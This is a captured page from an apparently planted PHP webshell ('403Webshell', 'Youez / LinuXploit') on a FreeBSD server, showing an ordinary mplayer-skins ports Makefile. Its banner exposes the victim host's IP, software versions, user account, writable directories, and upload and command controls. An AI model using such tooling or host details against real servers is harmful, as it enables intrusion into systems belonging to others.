403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/multimedia/mplayer-skins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/multimedia/mplayer-skins/Makefile
PORTNAME=	mplayer-skins
PORTVERSION=	1.1.5
CATEGORIES=	multimedia
MASTER_SITES=	http://www.mplayerhq.hu/MPlayer/skins/ \
		http://ftp.icm.edu.pl/packages/mplayer/skins/
DISTFILES=	# filled in later after options
DIST_SUBDIR=	mplayer-skins

MAINTAINER=	riggs@FreeBSD.org
COMMENT=	Skins for MPlayer's Graphical User Interface (GUI)
WWW=		http://www.mplayerhq.hu/

#
# When adding a new skin, please make sure to add it into the following
# Makefiles:
# - Makefile.skins
# - Makefile.options
#
# Then do "make config", select "All Skins" and run "make makesum".
#

USES=		tar:bzip2
NO_WRKSUBDIR=	yes
NO_BUILD=	yes

NO_ARCH=	yes

.include "${.CURDIR}/Makefile.options"

.include <bsd.port.pre.mk>

.include "${.CURDIR}/Makefile.skins"

myDATADIR=	share/${PORTNAME:S/-skins//}/skins
myWRKSRC=		${WRKSRC}/skins

post-extract:
	@${FIND} ${WRKSRC} -type d \( -name '.svn' \) -delete
	@${MKDIR} ${myWRKSRC}
	@for dir in `cd ${WRKSRC} && ${FIND} . -type d ! -name ".*" ! -name "skins" -maxdepth 1` ; do \
		${MV} ${WRKSRC}/$${dir#./} ${myWRKSRC}; \
	done

pre-build:
.if ${PORT_OPTIONS:MALL}
PORT_OPTIONS+=	${ALLSKINS}
.endif

post-build-script:
DISTFILES+=	${DEFAULT_FILE}${EXTRACT_SUFX}
.for f in ${ALLSKINS}
.if ${PORT_OPTIONS:M${f}}
PLIST_SUB+=	${f}="" WITHOUT_SKIN_${f}="@comment "
DISTFILES+=	${${f}_FILE}${EXTRACT_SUFX}
.else
PLIST_SUB+=	${f}="@comment " WITHOUT_SKIN_${f}=""
.endif
.endfor

do-install:
# both anotate and create target directories
	@for dir in `cd ${myWRKSRC} && ${FIND} . -type d | ${SORT} -r` ; do \
		${MKDIR} "${STAGEDIR}${PREFIX}/${myDATADIR}/$${dir#./}" ; \
	done
# both anotate installed and install files
	@for f in `cd ${myWRKSRC} && ${FIND} . -type f | ${SORT}` ; do \
		${INSTALL_DATA} "${myWRKSRC}/$${f#./}" ${STAGEDIR}${PREFIX}/${myDATADIR}/$${f#./} ; \
	done
# Create link to the default skin
	@${LN} -sfh Blue ${STAGEDIR}${PREFIX}/${myDATADIR}/default

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit